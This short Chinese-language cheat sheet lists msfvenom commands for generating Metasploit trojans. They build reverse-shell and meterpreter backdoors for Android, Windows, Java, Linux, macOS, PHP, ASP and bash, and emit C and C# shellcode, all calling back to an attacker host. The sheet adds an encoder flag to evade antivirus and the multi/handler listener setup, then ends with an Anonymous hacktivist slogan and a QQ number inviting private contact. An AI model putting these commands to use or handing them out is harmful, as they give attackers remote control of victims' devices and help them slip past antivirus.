Metasploit 生成木马
2. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > apk.apk //安卓 3. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -a x86 -f dll > shell.dll // DLL后门 4. msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 W > text.jar //Java后门 5. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 R >> /root/Desktop/test //linux 后门 需要把test加权限 chmod +x ./test 6. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f raw > shell.py //python 7. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f raw > shell.php //PHP 8. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f asp > shell.asp //asp 9. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f aspx > shell.aspx //aspx 10. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f c > shellcode.c //生成C语言shellcode 11. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f csharp > shellcode.txt //生成C#语言shellcode 12.msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.7 LPORT=4444 -f raw -o shell.sh //生成bash文件(可用于Unix系统) 13.msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho //生成MacOS的后门 14.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf //生成Linux的后门 ———————————————————————————————— 如果要使用编码免杀加上参数 -e x86/shikata_ga_nai 监听利用模块: use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
exploit
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
EXPECT US.
可以私聊吗,2795894799Q私聊